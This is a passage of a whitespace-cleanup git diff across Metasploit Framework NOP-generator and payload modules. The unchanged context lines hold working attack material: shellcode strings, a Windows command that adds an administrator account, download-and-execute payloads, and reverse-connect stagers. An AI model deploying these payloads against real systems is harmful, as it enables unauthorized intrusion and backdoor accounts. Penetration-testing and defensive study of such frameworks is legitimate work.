http://metasploit.com/framework/ @@ -22,14 +22,14 @@ require 'msf/core' # ### class Metasploit3 < Msf::Nop - + # Nop types InsSethi = 0 InsArithmetic = 1 InsBranch = 2 - + # Generator table - SPARC_Table = [ + SPARC_Table = [ [ InsSethi, [ ], ], # sethi [ InsArithmetic, [ 0, 0 ], ], # add [ InsArithmetic, [ 0, 1 ], ], # and @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Nop [ InsBranch, [ 14 ] ], # bpos[,a] [ InsBranch, [ 15 ] ], # bvc[,a] ] - + def initialize super( 'Name' => 'SPARC NOP generator', 
@@ -97,17 +97,17 @@ class Metasploit3 < Msf::Nop # Nops are always random... def generate_sled(length, opts) - + badchars = opts['BadChars'] || '' random = opts['Random'] || datastore['RandomNops'] blen = length - + buff = '' count = 0 while (buff.length < blen) r = SPARC_Table[ rand(SPARC_Table.length) ] t = '' - + case r[0] when InsSethi t = ins_sethi(r[1], blen - buff.length) @@ -119,18 +119,18 @@ class Metasploit3 < Msf::Nop print_status("Invalid opcode type") raise RuntimeError end - + failed = false - + t.each_byte do |c| failed = true if badchars.include?(c.chr) end - + if (not failed) buff << t count = -100 end - + if (count > length + 1000) if(buff.length != 0) return buff.slice(0, 4) * (blen / 4) @@ -138,10 +138,10 @@ class Metasploit3 < Msf::Nop print_status("The SPARC nop generator could not create a usable sled") raise RuntimeError end - + count += 1 end - + return buff end @@ -159,7 +159,7 @@ class Metasploit3 < Msf::Nop def ins_sethi(ref, len=0) [(get_dst_reg() << 25) | (4 << 22) | rand(1 << 22)].pack('N') end - + def ins_arithmetic(ref, len=0) dst = get_dst_reg() ver = ref[0] 
@@ -174,45 +174,45 @@ class Metasploit3 < Msf::Nop # Use one src reg with a signed 13-bit immediate (non-0) if((ver == 0 && rand(2)) || ver == 1) return [ - (2 << 30) | - (dst << 25) | - (ref[1] << 19) | - (get_src_reg() << 14) | - (1 << 13) | + (2 << 30) | + (dst << 25) | + (ref[1] << 19) | + (get_src_reg() << 14) | + (1 << 13) | (rand((1 << 13) - 1) + 1) ].pack('N') end # ref[1] could be replaced with a static value since this only encodes for one function but it's done this way for - # conistancy/clarity. + # conistancy/clarity. if (ver == 4) return [(2 << 30) | (dst << 25) | (ref[1] << 19)].pack('N') end - + # Use two src regs return [ - (2 << 30) | - (dst << 25) | - (ref[1] << 19) | - (get_src_reg() << 14) | + (2 << 30) | + (dst << 25) | + (ref[1] << 19) | + (get_src_reg() << 14) | get_src_reg() ].pack('N') end - + def ins_branch(ref, len) # We jump to 1 instruction before the payload so in cases where the delay slot is another branch instruction that is # not taken with the anull bit set the first bit of the payload is not anulled. len = (len / 4) - 1 - + return '' if len == 0 len = 0x3fffff if (len >= 0x400000) - + return [ - (rand(2) << 29) | - (ref[0] << 25) | - (2 << 22) | + (rand(2) << 29) | + (ref[0] << 25) | + (2 << 22) | rand(len - 1) + 1 - ].pack('N') + ].pack('N') end - -end \ No newline at end of file + +end diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 7da6c86884..d2f233bf20 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 8a7219dd80..45fb2a653f 100644 
--- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -117,11 +117,11 @@ class Metasploit3 < Msf::Nop [ "\x49\xBE", 8, "mov r14, 0x????????????????" ], [ "\x49\xBF", 8, "mov r15, 0x????????????????" ], ] - + I_OP = 0 I_SIZE = 1 I_TEXT = 2 - + REGISTERS = [ [ "rsp", "esp", "sp" ], [ "rbp", "ebp", "bp" ], [ "rax", "eax", "ax", "al", "ah" ], @@ -146,11 +146,11 @@ class Metasploit3 < Msf::Nop sled = '' try_count = 0 good_bytes = [] - + # Fixup SaveRegisters so for example, if we wish to preserve RSP we also should also preserve ESP and SP REGISTERS.each { | reg | reg.each { |x| badregs += reg if badregs.include?( x ) } } badregs = badregs.uniq() - + # If we are preserving RSP we should avoid all PUSH/POP instructions... if badregs.include?( "rsp" ) badregs.push( 'push' ) @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Nop while true # Pick a random instruction and see if we can use it... instruction = instructions[ rand(instructions.length) ] - + # Avoid using any bad mnemonics/registers... try_another = false badregs.each do | bad | @@ -169,19 +169,19 @@ class Metasploit3 < Msf::Nop break if try_another end next if try_another - + # Get the first bytes of the chosed instructions opcodes... opcodes = instruction[I_OP] - + # If their are additional bytes to append, do it now... 1.upto( instruction[I_SIZE] ) do | i | opcodes += Rex::Text.rand_char( badchars ) end - + # If we have gone over the requested sled length, try again. if total_size + opcodes.length > length try_count -= 1 - + # If we have tried unsuccessfully 32 times we start unwinding the chosen opcode_stack to speed things up if try_count == 0 pop_count = 4 
@@ -192,25 +192,25 @@ class Metasploit3 < Msf::Nop end next end - + # Reset the try_count for the next itteration. try_count = 32 - + # save the opcodes we just generated. opcodes_stack.push( opcodes ) - + # Increment the total size appropriately. total_size += opcodes.length - + # Once we have generated the requested amount of bytes we can finish. break if total_size == length end - + # Now that we have chosen all the instructions to use we must generate the actual sled. opcodes_stack.each do | opcodes_ | sled += opcodes_ end - + return sled end @@ -220,7 +220,7 @@ class Metasploit3 < Msf::Nop badregs = opts['SaveRegisters'] || [] good_instructions = [] sled = '' - + # Weed out any instructions which will contain a bad char/instruction... INSTRUCTIONS.each do | instruction | good = true; @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Nop end # if we are only to generate single byte instructions, weed out the multi byte ones... good = false if instruction[I_SIZE] > 0 and not datastore['MultiByte'] - + good_instructions.push( instruction ) if good end @@ -250,7 +250,7 @@ class Metasploit3 < Msf::Nop else sled += generate_random_sled( length, good_instructions, badchars, badregs ) end - + return sled end diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index c1d30369a0..22e5fbc85b 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index b18f79ea93..3b42a5ba50 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,7 +21,7 @@ require 'msf/core' ### class Metasploit3 < Msf::Nop -SINGLE_BYTE_SLED = +SINGLE_BYTE_SLED = { # opcode affected registers # ------ ------------------ @@ -152,4 +152,4 @@ SINGLE_BYTE_SLED = return out_sled end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/bsd/x86/exec.rb b/modules/payloads/singles/bsd/x86/exec.rb index 0830964b72..50da315b5e 100644 --- a/modules/payloads/singles/bsd/x86/exec.rb +++ b/modules/payloads/singles/bsd/x86/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -56,4 +56,4 @@ module Metasploit3 "\x57\x53\x89\xe1\x52\x51\x53\x50\xcd\x80" end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb index 900f69e2ce..3663c4489a 100644 --- a/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 49a3db3e73..91da79dc53 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -27,9 +27,9 @@ module Metasploit3 'Platform' => [ 'win', 'linux', 'bsd', 'solaris', 'bsdi', 'osx' ], 'License' => MSF_LICENSE, 'Arch' => ARCH_X86, - 'Payload' => + 'Payload' => { - 'Payload' => + 'Payload' => "\xcc" } )) diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index 88b69fd6c7..01d1cef79a 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 09049a908a..fdc2562cb2 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -25,7 +25,7 @@ module Metasploit3 include Msf::Payload::Single include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Add User', @@ -58,7 +58,7 @@ module Metasploit3 "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58" + "\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70" + "\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd" + - "\x80\x93" + Rex::Arch::X86.call(str.length) + str + + "\x80\x93" + Rex::Arch::X86.call(str.length) + str + "\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58" + "\xcd\x80" end diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 2671e51819..248496e351 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -25,7 +25,7 @@ module Metasploit3 include Msf::Payload::Single include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Linux Execute Command', @@ -55,4 +55,4 @@ module Metasploit3 "\x57\x53\x89\xe1\xcd\x80" end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index 6042137b76..ec3d6ee6e2 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb 
+++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,7 +23,7 @@ module Metasploit3 'Name' => 'OSX iPhone Vibrate', 'Version' => '$Revision$', 'Description' => %q| - Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. + Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded. Based on work by Charlie Miller <cmiller[at]securityevaluators.com>. |, 'Author' => 'hdm', @@ -41,4 +41,4 @@ module Metasploit3 ].pack("V*") end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 1f6358ce41..e5ff217d38 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -48,11 +48,11 @@ module Metasploit3 def generate cmd = datastore['CMD'] || '' payload = - "\x31\xc0\x50"+ + "\x31\xc0\x50"+ Rex::Arch::X86.call(cmd.length + 1) + cmd + "\x00\x5e\x89\xe7\xb9\x1e\x00" + "\x00\x00\xfc\xf2\xa4\x89\xe3\x50" + "\x50\x53\xb0\x3b\x50\xcd\x80" end -end \ No newline at end of file +end diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index 957f389f2c..4d292f8f37 100644 --- a/modules/payloads/singles/php/download_exec.rb 
+++ b/modules/payloads/singles/php/download_exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -15,7 +15,7 @@ require 'msf/core/payload/php' module Metasploit3 - + include Msf::Payload::Php include Msf::Payload::Single @@ -30,7 +30,7 @@ module Metasploit3 'Arch' => ARCH_PHP, 'Privileged' => false )) - + # EXITFUNC is not supported :/ deregister_options('EXITFUNC') diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 78c5461db3..665a43e048 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -46,7 +46,7 @@ module Metasploit3 #{php_preamble({:disabled_varname => dis})} #{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis})} END_OF_PHP_CODE - + return Rex::Text.compress(shell) end diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index eb4d0002ca..ad9707bd8c 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index 9bbd90412c..94d6b53d89 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,10 +51,10 @@ module Metasploit3 def command_string user = datastore['USER'] || 'metasploit' pass = datastore['PASS'] || '' - + if(pass.length > 14) raise ArgumentError, "Password for the adduser payload must be 14 characters or less" - end + end return "cmd.exe /c net user #{user} #{pass} /ADD && " + "net localgroup Administrators #{user} /ADD" diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 709ef800b3..3851aa362a 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -15,7 +15,7 @@ require 'msf/core/payload/windows/exec' module Metasploit3 - + include Msf::Payload::Windows include Msf::Payload::Single @@ -29,7 +29,7 @@ module Metasploit3 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => false, - 'Payload' => + 'Payload' => { 'Offsets' => { }, 'Payload' => @@ -54,10 +54,10 @@ module Metasploit3 "\xD8\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xCD\xF1"+ "\xEB\xFC\xF8\xFD\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0"+ "\xD8\x99\xEC\xEB\xF5\xF4\xF6\xF7\x99\xCC\xCB\xD5\xDD\xF6\xEE\xF7"+ - "\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99" + "\xF5\xF6\xF8\xFD\xCD\xF6\xDF\xF0\xF5\xFC\xD8\x99" } )) - + # EXITFUNC is not supported :/ deregister_options('EXITFUNC') diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 3ef2aac265..c49e9883c8 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -23,4 +23,4 @@ module Metasploit3 include Msf::Payload::Windows::Exec -end \ No newline at end of file +end diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index d85ae2839a..9117837c65 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -55,7 +55,7 @@ module Metasploit3 )) register_options( [ OptString.new('CMD', [ true, "The command string to execute" ]), ], self.class ) end - + def generate return super + command_string + "\x00" end @@ -63,5 +63,5 @@ module Metasploit3 def command_string return datastore['CMD'] || '' end - + end diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index 408d833a43..bc50121fec 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,4 +51,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index 78ee185353..77e8b6e3f7 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -50,4 +50,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index ded0536194..835c141614 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -51,4 +51,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index 45b7bf333c..4fa1e6a9e0 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index 2d95e42000..60dba2ba05 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -52,4 +52,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index 9bcc174b1f..c2ca3dc1b0 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb 
@@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index 7c1151e25f..72c2cc7154 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager', diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index b917ae58cb..5efb1083fc 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Find Tag Stager', 
diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index cb7850fa2f..a32cee5394 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 6f6b767f69..a19c668ab8 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -26,7 +26,7 @@ module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux - + def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager', diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 2ebbd2af21..686becefec 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb 
@@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -96,7 +100,7 @@ main_code: mov bp, word ptr [ebx+0x4E] shl ebp, 16 mov bp, word ptr [ebx+0x48] - + f_finddebugger: cmp dword ptr[ebp], 0 jnz f_next @@ -121,12 +125,12 @@ resolv_ptrs: dec cl test cl, cl jnz resolv_ptrs - + sti // remove CIFS lock call [edi-4] // NSS.NLM|NSSMPK_UnlockNss - + // allocate heap buffer to remove the code from the stack (if on the stack) // network functions will give back control to the kernel and we don't want // the driver to erase our shellcode @@ -157,7 +161,7 @@ reverse_connect: mov esi, eax test eax, eax jz end - + push ebx push ebx push LHOST diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index 670c5f5e65..3a9847e67f 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -145,17 +145,17 @@ module Metasploit3 end def handle_intermediate_stage(conn, payload) - + print_status("Transmitting stage length value...(#{payload.length} bytes)") address_format = 'V' - + # Transmit our intermediate stager conn.put( [ payload.length ].pack(address_format) ) Rex::ThreadSafe.sleep(0.5) return true - end - -end \ No newline at end of file + end + +end 
diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index 2125659d46..6fa8554136 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -73,7 +73,7 @@ module Metasploit3 0x5c110200, # host 192.168.0.135 - 0x8700a8c0, + 0x8700a8c0, # connect 0xe1a0000a, # mov r0, r10 @@ -114,24 +114,24 @@ module Metasploit3 # exit process 0xe3a0c001, # mov r12, #0x1 0xef000080, # swi 128 - ].pack("V*") + ].pack("V*") } )) end def handle_intermediate_stage(conn, payload) - + print_status("Transmitting stage length value...(#{payload.length} bytes)") address_format = 'V' - + # Transmit our intermediate stager conn.put( [ payload.length ].pack(address_format) ) Rex::ThreadSafe.sleep(0.5) return true - end - -end \ No newline at end of file + end + +end diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 01b5d527a9..758c672d85 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -57,4 +57,4 @@ module Metasploit3 )) end -end \ No newline at end of file +end 
